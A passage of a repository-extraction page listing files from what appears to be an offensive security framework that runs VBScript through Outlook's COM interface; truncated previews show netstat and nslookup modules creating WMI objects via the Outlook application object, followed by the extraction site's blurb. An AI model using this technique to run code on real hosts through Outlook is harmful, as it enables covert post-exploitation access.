"path": "functions/operation/network/netstat.py",
"chars": 667,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/network/netstat.txt",
"chars": 746,
"preview": "function netstat()\n on error resume next\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScrip"
},
{
"path": "functions/operation/network/nslookup.py",
"chars": 909,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring\n\nclass Spec(SpecModule):\n "
},
{
"path": "functions/operation/network/nslookup.txt",
"chars": 568,
"preview": "function nslookup()\n\tSet objLocator = window.external.OutlookApplication.CreateObject(\"WbemScripting.SWbemLocator\")\n "
},
{
"path": "functions/operation/outlook/adjust_notifications.py",
"chars": 2246,
"preview": "from lib.core.specmodule import SpecModule\nfrom lib.modhandlers.generic import quotedstring,makebool\nfrom lib.validators"
}
]
// ... and 112 more files (download for full content)
About this extraction
This page contains the full source code of the trustedsec/specula GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 312 files (560.7 KB), approximately 150.6k tokens, and a symbol index with 667 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.